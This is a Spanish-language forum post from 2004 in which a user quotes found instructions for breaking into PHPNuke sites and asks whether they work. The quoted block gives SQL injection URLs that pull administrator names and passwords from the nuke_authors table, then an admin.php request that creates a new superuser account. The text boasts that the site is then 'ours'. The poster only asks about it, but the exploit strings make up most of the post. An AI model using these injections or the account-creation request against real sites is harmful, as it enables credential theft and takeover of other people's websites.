Ver Mensaje Individual
  #1 (permalink)  
Antiguo 15/06/2004, 20:21
Avatar de Mickel
Mickel
 
Fecha de Ingreso: mayo-2002
Ubicación: Lima, Peru
Mensajes: 4.619
Antigüedad: 22 años, 7 meses
Puntos: 7
Pregunta Es posible romper la seguridad de PHPNuke?

Encontre esta informacion
Cita:
En primer lugar, se puede obtener una sentencia SQL con el password del administrador principal del sitio web con esta orden:

/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_a uthors

Tambien se pueden sacar más datos asi:

/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,p wd,url,url,10000,name%20FROM%20nuke_authors/*

Una vez obtenida la password del usuario ROOT, podemos crearnos una cuenta de superusuario:

/admin.php?op=AddAuthor&add_radminsuper=1&add_name= TLTLTL&add_aid=TLTLTL&add_
[email protected]&add_pwd=12345&admin=

Una vez tenemos una cuenta con dichos privilegios, el site es nuestro y podemos hacer lo que queramos.
Alguien sabe que tan cierto es? No me animo a probarlo...